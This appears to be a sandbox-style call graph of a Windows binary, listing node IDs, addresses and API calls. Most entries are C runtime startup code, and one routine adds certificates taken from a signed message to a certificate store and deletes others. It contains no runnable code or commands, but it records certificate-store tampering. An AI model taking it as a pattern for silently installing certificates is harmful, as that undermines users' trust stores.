4927->4896 5053 5e20b0 4929->5053 4932 5e13f0 4933 5e3457 4932->4933 5055 5e522b 4933->5055 4935 5e3460 4937 5e13f8 4935->4937 5059 5e55b6 4935->5059 4938 5e1000 6 API calls 4937->4938 4939 5e1096 CryptMsgGetParam 4938->4939 4940 5e11e3 Sleep 4938->4940 4941 5e10bc LocalAlloc 4939->4941 4942 5e1162 CryptMsgGetParam 4939->4942 4943 5e1215 CertCloseStore LocalFree LocalFree LocalFree 4940->4943 4947 5e11f7 4940->4947 4945 5e1156 LocalFree 4941->4945 4946 5e10d7 4941->4946 4942->4940 4944 5e1174 CryptMsgGetParam 4942->4944 4943->4913 4944->4940 4950 5e1188 CertFindAttribute CertFindAttribute 4944->4950 4945->4942 4948 5e10e0 LocalAlloc CryptMsgGetParam 4946->4948 4947->4943 4949 5e120a CertDeleteCertificateFromStore 4947->4949 4951 5e113d LocalFree 4948->4951 4952 5e1114 CertCreateCertificateContext 4948->4952 4949->4947 4953 5e11b5 LoadLibraryA GetProcAddress 4950->4953 4954 5e11b1 4950->4954 4951->4948 4957 5e114d 4951->4957 4955 5e1126 CertAddCertificateContextToStore 4952->4955 4956 5e1133 CertFreeCertificateContext 4952->4956 4953->4940 4954->4940 4954->4953 4955->4956 4956->4951 4957->4945 4959 5e37d1 _abort 4958->4959 4959->4905 4960 5e4424 _abort 33 API calls 4959->4960 4961 5e3e9a 4960->4961 4962 5e3f24 _abort 33 API calls 4961->4962 4963 5e3ec4 4962->4963 4965 5e140c 4964->4965 4965->4899 4965->4916 5547 5e355e 4966->5547 4968 5e378f 4968->4917 4970 5e17a8 ___scrt_uninitialize_crt 4969->4970 4971 5e1421 4970->4971 4972 5e1f7d ___scrt_uninitialize_crt 7 API calls 4970->4972 4971->4904 4972->4971 4974 5e1935 _abort 4973->4974 4975 5e19e0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 4974->4975 4976 5e1a24 _abort 4975->4976 4976->4899 4978 5e355e _abort 23 API calls 4977->4978 4979 5e37f2 4978->4979 4979->4900 4981 5e355e _abort 23 API calls 4980->4981 4982 5e1488 4981->4982 4984 5e1640 4983->4984 4985 5e1f5e 4984->4985 4999 5e24b1 4985->4999 4989 5e1f6f 4990 5e1f7a 4989->4990 5013 5e24ed 4989->5013 4990->4926 4992 5e1f67 4992->4926 4994 5e1f86 4993->4994 4995 5e1f90 4993->4995 4996 5e2496 ___vcrt_uninitialize_ptd 6 API calls 4994->4996 4995->4927 4997 5e1f8b 4996->4997 4998 5e24ed ___vcrt_uninitialize_locks DeleteCriticalSection 4997->4998 4998->4995 5000 5e24ba 4999->5000 5002 5e24e3 5000->5002 5003 5e1f63 5000->5003 5017 5e271d 5000->5017 5004 5e24ed ___vcrt_uninitialize_locks DeleteCriticalSection 5002->5004 5003->4992 5005 5e2463 5003->5005 5004->5003 5034 5e262e 5005->5034 5008 5e2478 5008->4989 5011 5e2493 5011->4989 5014 5e2517 5013->5014 5015 5e24f8 5013->5015 5014->4992 5016 5e2502 DeleteCriticalSection 5015->5016 5016->5014 5016->5016 5022 5e2543 5017->5022 5020 5e2755 InitializeCriticalSectionAndSpinCount 5021 5e2740 5020->5021 5021->5000 5023 5e2560 5022->5023 5024 5e2564 5022->5024 5023->5020 5023->5021 5024->5023 5025 5e25cc GetProcAddress 5024->5025 5027 5e25bd 5024->5027 5029 5e25e3 LoadLibraryExW 5024->5029 5025->5023 5027->5025 5028 5e25c5 FreeLibrary 5027->5028 5028->5025 5030 5e262a 5029->5030 5031 5e25fa GetLastError 5029->5031 5030->5024 5031->5030 5032 5e2605 5031->5032 5032->5030 5033 5e261b LoadLibraryExW 5032->5033 5033->5024 5035 5e2543 ___vcrt_FlsGetValue 5 API calls 5034->5035 5036 5e2648 5035->5036 5037 5e2661 TlsAlloc 5036->5037 5038 5e246d 5036->5038 5038->5008 5039 5e26df 5038->5039 5040 5e2543 ___vcrt_FlsGetValue 5 API calls 5039->5040 5041 5e26f9 5040->5041 5042 5e2714 TlsSetValue 5041->5042 5043 5e2486 5041->5043 5042->5043 5043->5011 5044 5e2496 5043->5044 5045 5e24a6 5044->5045 5046 5e24a0 5044->5046 5045->5008 5048 5e2669 5046->5048 5049 5e2543 ___vcrt_FlsGetValue 5 API calls 5048->5049 5050 5e2683 5049->5050 5051 5e269b TlsFree 5050->5051 5052 5e268f 5050->5052 5051->5052 5052->5045 5054 5e1a47 GetStartupInfoW 5053->5054 5054->4932 5056 5e5234 5055->5056 5058 5e523d 5055->5058 5062 5e512a 5056->5062 5058->4935 5544 5e555d 5059->5544 5082 5e4424 GetLastError 5062->5082 5064 5e5137 5102 5e5249 5064->5102 5066 5e513f 5111 5e4ebe 5066->5111 5069 5e5156 5069->5058 5073 5e518c 5075 5e5194 5073->5075 5079 5e51b1 5073->5079 5133 5e47f9 5075->5133 5077 5e51dd 5078 5e5199 5077->5078 5142 5e4d94 5077->5142 5136 5e4869 5078->5136 5079->5077 5080 5e4869 _free 15 API calls 5079->5080 5080->5077 5083 5e443a 5082->5083 5084 5e4440 5082->5084 5145 5e5904 5083->5145 5089 5e448f SetLastError 5084->5089 5150 5e480c 5084->5150 5088 5e445a 5091 5e4869 _free 15 API calls 5088->5091 5089->5064 5093 5e4460 5091->5093 5092 5e446f 5092->5088 5094 5e4476 5092->5094 5095 5e449b SetLastError 5093->5095 5162 5e4296 5094->5162 5167 5e3f24 5095->5167 5100 5e4869 _free 15 API calls 5101 5e4488 5100->5101 5101->5089 5101->5095 5103 5e5255 ___scrt_is_nonwritable_in_current_image 5102->5103 5104 5e4424 _abort 33 API calls 5103->5104 5109 5e525f 5104->5109 5106 5e52e3 _abort 5106->5066 5107 5e3f24 _abort 33 API calls 5107->5109 5109->5106 5109->5107 5110 5e4869 _free 15 API calls 5109->5110 5403 5e56e2 EnterCriticalSection 5109->5403 5404 5e52da 5109->5404 5110->5109 5408 5e3f72 5111->5408 5114 5e4edf GetOEMCP 5116 5e4f08 5114->5116 5115 5e4ef1 5115->5116 5117 5e4ef6 GetACP 5115->5117 5116->5069 5118 5e62ff 5116->5118 5117->5116 5119 5e633d 5118->5119 5123 5e630d _abort 5118->5123 5120 5e47f9 _free 15 API calls 5119->5120 5122 5e5167 5120->5122 5121 5e6328 HeapAlloc 5121->5122 5121->5123 5122->5078 5125 5e52eb 5122->5125 5123->5119 5123->5121 5124 5e6992 _abort 2 API calls 5123->5124 5124->5123 5126 5e4ebe 35 API calls 5125->5126 5127 5e530a 5126->5127 5128 5e535b IsValidCodePage 5127->5128 5130 5e5311 _ValidateLocalCookies 5127->5130 5132 5e5380 _abort 5127->5132 5129 5e536d GetCPInfo 5128->5129 5128->5130 5129->5130 5129->5132 5130->5073 5445 5e4f96 GetCPInfo 5132->5445 5134 5e44a8 __dosmaperr 15 API calls 5133->5134 5135 5e47fe 5134->5135 5135->5078 5137 5e4874 HeapFree 5136->5137 5138 5e489d _free 5136->5138 5137->5138 5139 5e4889 5137->5139 5138->5069 5140 5e47f9 _free 13 API calls 5139->5140 5141 5e488f GetLastError 5140->5141 5141->5138 5508 5e4d51 5142->5508 5144 5e4db8 5144->5078 5178 5e5741 5145->5178 5147 5e592b 5148 5e5943 TlsGetValue 5147->5148 5149 5e5937 _ValidateLocalCookies 5147->5149 5148->5149 5149->5084 5156 5e4819 _abort 5150->5156 5151 5e4859 5154 5e47f9 _free 14 API calls 5151->5154 5152 5e4844 HeapAlloc 5153 5e4452 5152->5153 5152->5156 5153->5088 5157 5e595a 5153->5157 5154->5153 5156->5151 5156->5152 5191 5e6992 5156->5191 5158 5e5741 _abort 5 API calls 5157->5158 5159 5e5981 5158->5159 5160 5e599c TlsSetValue 5159->5160 5161 5e5990 _ValidateLocalCookies 5159->5161 5160->5161 5161->5092 5205 5e426e 5162->5205 5313 5e6b14 5167->5313 5170 5e3f35 5172 5e3f3e IsProcessorFeaturePresent 5170->5172 5173 5e3f5c 5170->5173 5174 5e3f49 5172->5174 5175 5e3793 _abort 23 API calls 5173->5175 5341 5e4573 5174->5341 5177 5e3f66 5175->5177 5179 5e576d 5178->5179 5180 5e5771 _abort 5178->5180 5179->5180 5181 5e5791 5179->5181 5184 5e57dd 5179->5184 5180->5147 5181->5180 5183 5e579d GetProcAddress 5181->5183 5183->5180 5185 5e57fe LoadLibraryExW 5184->5185 5186 5e57f3 5184->5186 5187 5e581b GetLastError 5185->5187 5188 5e5833 5185->5188 5186->5179 5187->5188 5190 5e5826 LoadLibraryExW 5187->5190 5188->5186 5189 5e584a FreeLibrary 5188->5189 5189->5186 5190->5188 5194 5e69d6 5191->5194 5193 5e69a8 _ValidateLocalCookies 5193->5156 5195 5e69e2 ___scrt_is_nonwritable_in_current_image 5194->5195 5200 5e56e2 EnterCriticalSection 5195->5200 5197 5e69ed 5201 5e6a1f 5197->5201 5199 5e6a14 _abort 5199->5193 5200->5197 5204 5e572a LeaveCriticalSection 5201->5204 5203 5e6a26 5203->5199 5204->5203 5211 5e41ae 5205->5211 5207 5e4292 5208 5e421e 5207->5208 5222 5e40b2 5208->5222 5210 5e4242 5210->5100 5212 5e41ba ___scrt_is_nonwritable_in_current_image 5211->5212 5217 5e56e2 EnterCriticalSection 5212->5217 5214 5e41c4 5218 5e41ea 5214->5218 5216 5e41e2 _abort 5216->5207 5217->5214 5221 5e572a LeaveCriticalSection 5218->5221 5220 5e41f4 5220->5216 5221->5220 5223 5e40be ___scrt_is_nonwritable_in_current_image 5222->5223 5230 5e56e2 EnterCriticalSection 5223->5230 5225 5e40c8 5231 5e43d9 5225->5231 5227 5e40e0 5235 5e40f6 5227->5235 5229 5e40ee _abort 5229->5210 5230->5225 5232 5e440f __fassign 5231->5232 5233 5e43e8 __fassign 5231->5233 5232->5227 5233->5232 5238 5e6507 5233->5238 5312 5e572a LeaveCriticalSection 5235->5312 5237 5e4100 5237->5229 5240 5e6587 5238->5240 5241 5e651d 5238->5241 5242 5e4869 _free 15 API calls 5240->5242 5265 5e65d5 5240->5265 5241->5240 5246 5e4869 _free 15 API calls 5241->5246 5262 5e6550 5241->5262 5243 5e65a9 5242->5243 5244 5e4869 _free 15 API calls 5243->5244 5247 5e65bc 5244->5247 5245 5e4869 _free 15 API calls 5248 5e657c 5245->5248 5250 5e6545 5246->5250 5252 5e4869 _free 15 API calls 5247->5252 5255 5e4869 _free 15 API calls 5248->5255 5249 5e6643 5256 5e4869 _free 15 API calls 5249->5256 5266 5e6078 5250->5266 5251 5e4869 _free 15 API calls 5253 5e6567 5251->5253 5254 5e65ca 5252->5254 5294 5e6176 5253->5294 5260 5e4869 _free 15 API calls 5254->5260 5255->5240 5261 5e6649 5256->5261 5258 5e4869 15 API calls _free 5263 5e65e3 5258->5263 5260->5265 5261->5232 5262->5251 5264 5e6572 5262->5264 5263->5249 5263->5258 5264->5245 5306 5e667a 5265->5306 5267 5e6089 5266->5267 5268 5e6172 5266->5268 5269 5e609a 5267->5269 5270 5e4869 _free 15 API calls 5267->5270 5268->5262 5271 5e60ac 5269->5271 5272 5e4869 _free 15 API calls 5269->5272 5270->5269 5273 5e60be 5271->5273 5275 5e4869 _free 15 API calls 5271->5275 5272->5271 5274 5e60d0 5273->5274 5276 5e4869 _free 15 API calls 5273->5276 5277 5e60e2 5274->5277 5278 5e4869 _free 15 API calls 5274->5278 5275->5273 5276->5274 5279 5e60f4 5277->5279 5280 5e4869 _free 15 API calls 5277->5280 5278->5277 5281 5e6106 5279->5281 5283 5e4869 _free 15 API calls 5279->5283 5280->5279 5282 5e6118 5281->5282 5284 5e4869 _free 15 API calls 5281->5284 5285 5e612a 5282->5285 5286 5e4869 _free 15 API calls 5282->5286 5283->5281 5284->5282 5287 5e613c 5285->5287 5288 5e4869 _free 15 API calls 5285->5288 5286->5285 5289 5e614e 5287->5289 5291 5e4869 _free 15 API calls 5287->5291 5288->5287 5290 5e6160 5289->5290 5292 5e4869 _free 15 API calls 5289->5292 5290->5268 5293 5e4869 _free 15 API calls 5290->5293 5291->5289 5292->5290 5293->5268 5295 5e6183 5294->5295 5305 5e61db 5294->5305 5296 5e4869 _free 15 API calls 5295->5296 5297 5e6193 5295->5297 5296->5297 5298 5e4869 _free 15 API calls 5297->5298 5300 5e61a5 5297->5300 5298->5300 5299 5e61b7 5302 5e61c9 5299->5302 5303 5e4869 _free 15 API calls 5299->5303 5300->5299 5301 5e4869 _free 15 API calls 5300->5301 5301->5299 5304 5e4869 _free 15 API calls 5302->5304 5302->5305 5303->5302 5304->5305 5305->5264 5307 5e66a5 5306->5307 5308 5e6687 5306->5308 5307->5263 5308->5307 5309 5e621b __fassign 15 API calls 5308->5309 5310 5e669f 5309->5310 5311 5e4869 _free 15 API calls 5310->5311 5311->5307 5312->5237 5345 5e6a82 5313->5345 5316 5e6b6f 5317 5e6b7b _abort 5316->5317 5322 5e6ba8 _abort 5317->5322 5323 5e6ba2 _abort 5317->5323 5359 5e44a8 GetLastError 5317->5359 5319 5e6bf4 5320 5e47f9 _free 15 API calls 5319->5320 5321 5e6bf9 5320->5321 5378 5e473d 5321->5378 5327 5e6c20 5322->5327 5381 5e56e2 EnterCriticalSection 5322->5381 5323->5319 5323->5322 5325 5e6bd7 _abort 5323->5325 5325->5170 5328 5e6c7f 5327->5328 5330 5e6c77 5327->5330 5338 5e6caa 5327->5338 5382 5e572a LeaveCriticalSection 5327->5382 5328->5338 5383 5e6b66 5328->5383 5333 5e3793 _abort 23 API calls 5330->5333 5333->5328 5335 5e4424 _abort 33 API calls 5339 5e6d0d 5335->5339 5337 5e6b66 _abort 33 API calls 5337->5338 5386 5e6d2f 5338->5386 5339->5325 5340 5e4424 _abort 33 API calls 5339->5340 5340->5325 5342 5e458f _abort 5341->5342 5343 5e45bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5342->5343 5344 5e468c _abort _ValidateLocalCookies 5343->5344 5344->5173 5348 5e6a28 5345->5348 5347 5e3f29 5347->5170 5347->5316 5349 5e6a34 ___scrt_is_nonwritable_in_current_image 5348->5349 5354 5e56e2 EnterCriticalSection 5349->5354 5351 5e6a42 5355 5e6a76 5351->5355 5353 5e6a69 _abort 5353->5347 5354->5351 5358 5e572a LeaveCriticalSection 5355->5358 5357 5e6a80 5357->5353 5358->5357 5360 5e44c7 5359->5360 5361 5e44c1 5359->5361 5363 5e480c _abort 12 API calls 5360->5363 5365 5e451e SetLastError 5360->5365 5362 5e5904 _abort 6 API calls 5361->5362 5362->5360 5364 5e44d9 5363->5364 5366 5e595a _abort 6 API calls 5364->5366 5368 5e44e1 5364->5368 5367 5e4527 5365->5367 5370 5e44f6 5366->5370 5367->5323 5369 5e4869 _free 12 API calls 5368->5369 5371 5e44e7 5369->5371 5370->5368 5372 5e44fd 5370->5372 5373 5e4515 SetLastError 5371->5373 5374 5e4296 _abort 12 API calls 5372->5374 5373->5367 5375 5e4508 5374->5375 5376 5e4869 _free 12 API calls 5375->5376 5377 5e450e 5376->5377 5377->5365 5377->5373 5390 5e46c2 5378->5390 5380 5e4749 5380->5325 5381->5327 5382->5330 5384 5e4424 _abort 33 API calls 5383->5384 5385 5e6b6b 5384->5385 5385->5337 5387 5e6d35 5386->5387 5389 5e6cfe 5386->5389 5402 5e572a LeaveCriticalSection 5387->5402 5389->5325 5389->5335 5389->5339 5391 5e44a8 __dosmaperr 15 API calls 5390->5391 5392 5e46d8 5391->5392 5397 5e46e6 _ValidateLocalCookies 5392->5397 5398 5e474d IsProcessorFeaturePresent 5392->5398 5394 5e473c 5395 5e46c2 _abort 21 API calls 5394->5395 5396 5e4749 5395->5396 5396->5380 5397->5380 5399 5e4758 5398->5399 5400 5e4573 _abort 3 API calls 5399->5400 5401 5e476d GetCurrentProcess TerminateProcess 5400->5401 5401->5394 5402->5389 5403->5109 5407 5e572a LeaveCriticalSection 5404->5407 5406 5e52e1 5406->5109 5407->5406 5409 5e3f85 5408->5409 5410 5e3f8f 5408->5410 5409->5114 5409->5115 5410->5409 5411 5e4424 _abort 33 API calls 5410->5411 5412 5e3fb0 5411->5412 5416 5e72d1 5412->5416 5417 5e3fc9 5416->5417 5418 5e72e4 5416->5418 5420 5e72fe 5417->5420 5418->5417 5424 5e6754 5418->5424 5421 5e7326 5420->5421 5422 5e7311 5420->5422 5421->5409 5422->5421 5423 5e5249 __fassign 33 API calls 5422->5423 5423->5421 5425 5e6760 ___scrt_is_nonwritable_in_current_image 5424->5425 5426 5e4424 _abort 33 API calls 5425->5426 5427 5e6769 5426->5427 5429 5e67b7 _abort 5427->5429 5436 5e56e2 EnterCriticalSection 5427->5436 5429->5417 5430 5e6787 5437 5e67cb 5430->5437 5435 5e3f24 _abort 33 API calls 5435->5429 5436->5430 5438 5e67d9 __fassign 5437->5438 5440 5e679b 5437->5440 5439 5e6507 __fassign 15 API calls 5438->5439 5438->5440 5439->5440 5441 5e67ba 5440->5441 5444 5e572a LeaveCriticalSection 5441->5444 5443 5e67ae 5443->5429 5443->5435 5444->5443 5447 5e507a _ValidateLocalCookies 5445->5447 5449 5e4fd0 5445->5449 5447->5130 5448 5e5031 5465 5e7cd1 5448->5465 5453 5e634d 5449->5453 5452 5e7cd1 38 API calls 5452->5447 5454 5e3f72 __fassign 33 API calls 5453->5454 5455 5e636d MultiByteToWideChar 5454->5455 5457 5e63ab 5455->5457 5463 5e6443 _ValidateLocalCookies 5455->5463 5459 5e62ff 16 API calls 5457->5459 5461 5e63cc _abort __alloca_probe_16 5457->5461 5458 5e643d 5470 5e646a 5458->5470 5459->5461 5461->5458 5462 5e6411 MultiByteToWideChar 5461->5462 5462->5458 5464 5e642d GetStringTypeW 5462->5464 5463->5448 5464->5458 5466 5e3f72 __fassign 33 API calls 5465->5466 5467 5e7ce4 5466->5467 5474 5e7ab4 5467->5474 5469 5e5052 5469->5452 5471 5e6487 5470->5471 5472 5e6476 5470->5472 5471->5463 5472->5471 5473 5e4869 _free 15 API calls 5472->5473 5473->5471 5475 5e7acf 5474->5475 5476 5e7af5 MultiByteToWideChar 5475->5476 5477 5e7b1f 5476->5477 5486 5e7ca9 _ValidateLocalCookies 5476->5486 5478 5e7b40 __alloca_probe_16 5477->5478 5479 5e62ff 16 API calls 5477->5479 5480 5e7b89 MultiByteToWideChar 5478->5480 5481 5e7bf5 5478->5481 5479->5478 5480->5481 5482 5e7ba2 5480->5482 5484 5e646a __freea 15 API calls 5481->5484 5499 5e5a15 5482->5499 5484->5486 5485 5e7bb9 5485->5481 5487 5e7bcc 5485->5487 5488 5e7c04 5485->5488 5486->5469 5487->5481 5489 5e5a15 6 API calls 5487->5489 5491 5e62ff 16 API calls 5488->5491 5494 5e7c25 __alloca_probe_16 5488->5494 5489->5481 5490 5e7c9a 5493 5e646a __freea 15 API calls 5490->5493 5491->5494 5492 5e5a15 6 API calls 5495 5e7c79 5492->5495 5493->5481 5494->5490 5494->5492 5495->5490 5496 5e7c88 WideCharToMultiByte 5495->5496 5496->5490 5497 5e7cc8 5496->5497 5498 5e646a __freea 15 API calls 5497->5498 5498->5481 5500 5e5741 _abort 5 API calls 5499->5500 5501 5e5a3c 5500->5501 5504 5e5a45 _ValidateLocalCookies 5501->5504 5505 5e5a9d 5501->5505 5503 5e5a85 LCMapStringW 5503->5504 5504->5485 5506 5e5741 _abort 5 API calls 5505->5506 5507 5e5ac4 _ValidateLocalCookies 5506->5507 5507->5503 5509 5e4d5d ___scrt_is_nonwritable_in_current_image 5508->5509 5516 5e56e2 EnterCriticalSection 5509->5516 5511 5e4d67 5517 5e4dbc 5511->5517 5515 5e4d80 _abort 5515->5144 5516->5511 5529 5e54dc 5517->5529 5519 5e4e0a 5520 5e54dc 21 API calls 5519->5520 5521 5e4e26 5520->5521 5522 5e54dc 21 API calls 5521->5522 5523 5e4e44 5522->5523 5524 5e4d74 5523->5524 5525 5e4869 _free 15 API calls 5523->5525 5526 5e4d88 5524->5526 5525->5524 5543 5e572a LeaveCriticalSection 5526->5543 5528 5e4d92 5528->5515 5530 5e54ed 5529->5530 5533 5e54e9 5529->5533 5531 5e54f4 5530->5531 5535 5e5507 _abort 5530->5535 5532 5e47f9 _free 15 API calls 5531->5532 5534 5e54f9 5532->5534 5533->5519 5536 5e473d _abort 21 API calls 5534->5536 5535->5533 5537 5e553e 5535->5537 5538 5e5535 5535->5538 5536->5533 5537->5533 5540 5e47f9 _free 15 API calls 5537->5540 5539 5e47f9 _free 15 API calls 5538->5539 5541 5e553a 5539->5541 5540->5541 5542 5e473d _abort 21 API calls 5541->5542 5542->5533 5543->5528 5545 5e3f72 __fassign 33 API calls 5544->5545 5546 5e5571 5545->5546 5546->4935 5548 5e356a _abort 5547->5548 5556 5e3582 5548->5556 5562 5e36b8 GetModuleHandleW 5548->5562 5554 5e358a 5560 5e35ff _abort 5554->5560 5570 5e3c97 5554->5570 5569 5e56e2 EnterCriticalSection 5556->5569 5557 5e3671 _abort 5557->4968 5573 5e3668 5560->5573 5563 5e3576 5562->5563 5563->5556 5564 5e36fc GetModuleHandleExW 5563->5564 5565 5e373b 5564->5565 5566 5e3726 GetProcAddress 5564->5566 5567 5e374f FreeLibrary 5565->5567 5568 5e3758 _ValidateLocalCookies 5565->5568 5566->5565 5567->5568 5568->5556 5569->5554 5584 5e39d0 5570->5584 5604 5e572a LeaveCriticalSection 5573->5604 5575 5e3641 5575->5557 5576 5e3677 5575->5576 5605 5e5b1f 5576->5605 5578 5e3681 5579 5e36a5 5578->5579 5580 5e3685 GetPEB 5578->5580 5582 5e36fc _abort 3 API calls 5579->5582 5580->5579 5581 5e3695 GetCurrentProcess TerminateProcess 5580->5581 5581->5579 5583 5e36ad ExitProcess 5582->5583 5587 5e397f 5584->5587 5586 5e39f4 5586->5560 5588 5e398b ___scrt_is_nonwritable_in_current_image 5587->5588 5595 5e56e2 EnterCriticalSection 5588->5595 5590 5e3999 5596 5e3a20 5590->5596 5592 5e39a6 5600 5e39c4 5592->5600 5594 5e39b7 _abort 5594->5586 5595->5590 5597 5e3a48 5596->5597 5599 5e3a40 _ValidateLocalCookies 5596->5599 5598 5e4869 _free 15 API calls 5597->5598 5597->5599 5598->5599 5599->5592 5603 5e572a LeaveCriticalSection 5600->5603 5602 5e39ce 5602->5594 5603->5602 5604->5575 5606 5e5b44 5605->5606 5608 5e5b3a _ValidateLocalCookies 5605->5608 5607 5e5741 _abort 5 API calls 5606->5607 5607->5608 5608->5578 5670 5e324d 5671 5e522b 46 API calls 5670->5671 5672 5e325f 5671->5672 5681 5e561e GetEnvironmentStringsW 5672->5681 5676 5e4869 _free 15 API calls 5677 5e329f 5676->5677 5678 5e3275 5679 5e4869 _free 15 API calls 5678->5679 5680 5e326a 5679->5680 5680->5676 5682 5e5635 5681->5682 5692 5e5688 5681->5692 5683 5e563b WideCharToMultiByte 5682->5683 5686 5e5657 5683->5686 5683->5692 5684 5e3264 5684->5680 5693 5e32a5 5684->5693 5685 5e5691 FreeEnvironmentStringsW 5685->5684 5687 5e62ff 16 API calls 5686->5687 5688 5e565d 5687->5688 5689 5e5664 WideCharToMultiByte 5688->5689 5690 5e567a 5688->5690 5689->5690 5691 5e4869 _free 15 API calls 5690->5691 5691->5692 5692->5684 5692->5685 5694 5e32ba 5693->5694 5695 5e480c _abort 15 API calls 5694->5695 5705 5e32e1 5695->5705 5696 5e3345 5697 5e4869 _free 15 API calls 5696->5697 5698 5e335f 5697->5698 5698->5678 5699 5e480c _abort 15 API calls 5699->5705 5700 5e3347 5719 5e3376 5700->5719 5704 5e4869 _free 15 API calls 5704->5696 5705->5696 5705->5699 5705->5700 5706 5e3369 5705->5706 5708 5e4869 _free 15 API calls 5705->5708 5710 5e3eca 5705->5710 5707 5e474d _abort 6 API calls 5706->5707 5709 5e3375 5707->5709 5708->5705 5711 5e3ee5 5710->5711 5712 5e3ed7 5710->5712 5713 5e47f9 _free 15 API calls 5711->5713 5712->5711 5715 5e3efc 5712->5715 5714 5e3eed 5713->5714 5716 5e473d _abort 21 API calls 5714->5716 5717 5e3ef7 5715->5717 5718 5e47f9 _free 15 API calls 5715->5718 5716->5717 5717->5705 5718->5714 5723 5e334d 5719->5723 5724 5e3383 5719->5724 5720 5e339a 5721 5e4869 _free 15 API calls 5720->5721 5721->5723 5722 5e4869 _free 15 API calls 5722->5724 5723->5704 5724->5720 5724->5722 5725 5e1248 5726 5e1250 5725->5726 5742 5e37f7 5726->5742 5728 5e125b 5749 5e1664 5728->5749 5730 5e191f 4 API calls 5732 5e12f2 5730->5732 5731 5e1270 __RTC_Initialize 5740 5e12cd 5731->5740 5755 5e17f1 5731->5755 5734 5e1289 5734->5740 5758 5e18ab InitializeSListHead 5734->5758 5736 5e129f 5759 5e18ba 5736->5759 5738 5e12c2 5765 5e3891 5738->5765 5740->5730 5741 5e12ea 5740->5741 5743 5e3829 5742->5743 5744 5e3806 5742->5744 5743->5728 5744->5743 5745 5e47f9 _free 15 API calls 5744->5745 5746 5e3819 5745->5746 5747 5e473d _abort 21 API calls 5746->5747 5748 5e3824 5747->5748 5748->5728 5750 5e1674 5749->5750 5751 5e1670 5749->5751 5752 5e1681 ___scrt_release_startup_lock 5750->5752 5753 5e191f 4 API calls 5750->5753 5751->5731 5752->5731 5754 5e16ea 5753->5754 5772 5e17c4 5755->5772 5758->5736 5838 5e3e2a 5759->5838 5761 5e18cb 5762 5e18d2 5761->5762 5763 5e191f 4 API calls 5761->5763 5762->5738 5764 5e18da 5763->5764 5764->5738 5766 5e4424 _abort 33 API calls 5765->5766 5768 5e389c 5766->5768 5767 5e38d4 5767->5740 5768->5767 5769 5e47f9 _free 15 API calls 5768->5769 5770 5e38c9 5769->5770 5771 5e473d _abort 21 API calls 5770->5771 5771->5767 5773 5e17da 5772->5773 5774 5e17d3 5772->5774 5781 5e3cf1 5773->5781 5778 5e3c81 5774->5778 5777 5e17d8 5777->5734 5779 5e3cf1 24 API calls 5778->5779 5780 5e3c93 5779->5780 5780->5777 5784 5e39f8 5781->5784 5787 5e392e 5784->5787 5786 5e3a1c 5786->5777 5788 5e393a ___scrt_is_nonwritable_in_current_image 5787->5788 5795 5e56e2 EnterCriticalSection 5788->5795 5790 5e3948 5796 5e3b40 5790->5796 5792 5e3955 5806 5e3973 5792->5806 5794 5e3966 _abort 5794->5786 5795->5790 5797 5e3b5e 5796->5797 5804 5e3b56 _abort 5796->5804 5798 5e3bb7 5797->5798 5797->5804 5809 5e681b 5797->5809 5800 5e681b 24 API calls 5798->5800 5798->5804 5802 5e3bcd 5800->5802 5801 5e3bad 5803 5e4869 _free 15 API calls 5801->5803 5805 5e4869 _free 15 API calls 5802->5805 5803->5798 5804->5792 5805->5804 5837 5e572a LeaveCriticalSection 5806->5837 5808 5e397d 5808->5794 5810 5e6826 5809->5810 5811 5e684e 5810->5811 5812 5e683f 5810->5812 5815 5e685d 5811->5815 5818 5e7e13 5811->5818 5813 5e47f9 _free 15 API calls 5812->5813 5817 5e6844 _abort 5813->5817 5825 5e7e46 5815->5825 5817->5801 5819 5e7e1e 5818->5819 5820 5e7e33 HeapSize 5818->5820 5821 5e47f9 _free 15 API calls 5819->5821 5820->5815 5822 5e7e23 5821->5822 5823 5e473d _abort 21 API calls 5822->5823 5824 5e7e2e 5823->5824 5824->5815 5826 5e7e5e 5825->5826 5827 5e7e53 5825->5827 5829 5e7e66 5826->5829 5835 5e7e6f _abort 5826->5835 5828 5e62ff 16 API calls 5827->5828 5833 5e7e5b 5828->5833 5830 5e4869 _free 15 API calls 5829->5830 5830->5833 5831 5e7e99 HeapReAlloc 5831->5833 5831->5835 5832 5e7e74 5834 5e47f9 _free 15 API calls 5832->5834 5833->5817 5834->5833 5835->5831 5835->5832 5836 5e6992 _abort 2 API calls 5835->5836 5836->5835 5837->5808 5839 5e3e48 5838->5839 5841 5e3e68 5838->5841 5840 5e47f9 _free 15 API calls 5839->5840 5842 5e3e5e 5840->5842 5841->5761 5843 5e473d _abort 21 API calls 5842->5843 5843->5841 6574 5e1489 6577 5e1853 6574->6577 6576 5e148e 6576->6576 6578 5e1869 6577->6578 6580 5e1872 6578->6580 6581 5e1806 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6578->6581 6580->6576 6581->6580 5844 5e9146 IsProcessorFeaturePresent 6582 5e3d86 6583 5e1f7d ___scrt_uninitialize_crt 7 API calls 6582->6583 6584 5e3d8d 6583->6584 6419 5e98c5 6421 5e98ed 6419->6421 6420 5e9925 6421->6420 6422 5e991e 6421->6422 6423 5e9917 6421->6423 6432 5e9980 6422->6432 6428 5e9997 6423->6428 6429 5e99a0 6428->6429 6436 5ea06f 6429->6436 6431 5e991c 6433 5e99a0 6432->6433 6434 5ea06f __startOneArgErrorHandling 16 API calls 6433->6434 6435 5e9923 6434->6435 6438 5ea0ae __startOneArgErrorHandling 6436->6438 6440 5ea130 __startOneArgErrorHandling 6438->6440 6442 5ea472 6438->6442 6441 5ea166 _ValidateLocalCookies 6440->6441 6445 5ea786 6440->6445 6441->6431 6452 5ea495 6442->6452 6446 5ea7a8 6445->6446 6447 5ea793 6445->6447 6448 5e47f9 _free 15 API calls 6446->6448 6449 5e47f9 _free 15 API calls 6447->6449 6450 5ea7ad 6447->6450 6448->6450 6451 5ea7a0 6449->6451 6450->6441 6451->6441 6453 5ea4c0 __raise_exc 6452->6453 6454 5ea6b9 RaiseException 6453->6454 6455 5ea490 6454->6455 6455->6440 5845 5e1442 5846 5e1a6a GetModuleHandleW 5845->5846 5847 5e144a 5846->5847 5848 5e144e 5847->5848 5849 5e1480 5847->5849 5850 5e1459 5848->5850 5854 5e3775 5848->5854 5851 5e3793 _abort 23 API calls 5849->5851 5853 5e1488 5851->5853 5855 5e355e _abort 23 API calls 5854->5855 5856 5e3780 5855->5856 5856->5850 6456 